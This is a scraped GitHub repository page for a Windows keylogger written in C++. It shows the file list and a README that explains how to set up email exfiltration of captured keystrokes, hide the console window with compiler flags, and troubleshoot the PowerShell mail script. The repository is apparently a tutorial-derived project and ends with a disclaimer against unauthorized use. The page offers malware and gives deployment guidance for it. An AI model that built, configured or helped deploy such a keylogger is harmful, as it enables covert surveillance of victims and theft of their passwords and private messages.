Skip to content
Keylogger Code In C++ Will Work On Window 7, 8, 8.1, And 10
Branch: master
Clone or download
Pull request Compare This branch is even with Siegfried5:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore
Base64.h
Helper.h
IO.h
KeyConstants.h
KeybHook.h
LICENSE
README.md
SendMail.h
Timer.h
main.cpp
powershell.docx
powershell.ps1

README.md

C++ Keylogger

This is a KeyLogger I leaned to write from Udemy

Keylogger is Coded In C++, Will Work On Window 7, 8, 8.1, And 10

If you wish to use this keylogger You must edit the following lines of codes: 16-18 to sendMail also you must enable your email to use less secure apps in order for you to recive the emails

Compiler Setting For CodeBlocks:

  • added a new flag with the following Setting -> Compiler
    • name: windowsAPI
    • Compiler flags: -mwindows
    • linker flags: -mwindows
  • Have CodeBlocks use C++ 11 standards Setting -> Compiler
    • [ ]Have g++ follow the C++11 ISO C++ language standard [-std=c++11] must be toggled on

Debuging:

After you add the comiler flags and get it to compiler and it does not send the email their are a few
thing to check and do to get it to work.

  • Make Sure the email account used can support unsecure apps
  • Wifi; I have notice that sometimes the wifi will not allow email to send
  • Sometimes the powershell script in sendmail.h "does not work" So replace it with the code in powershell.docx

Disclamer:

If you use this keylogger on a computer that does not belong to you or do not have permission to you are responsible for the outcome. NOT ME.

You can’t perform that action at this time.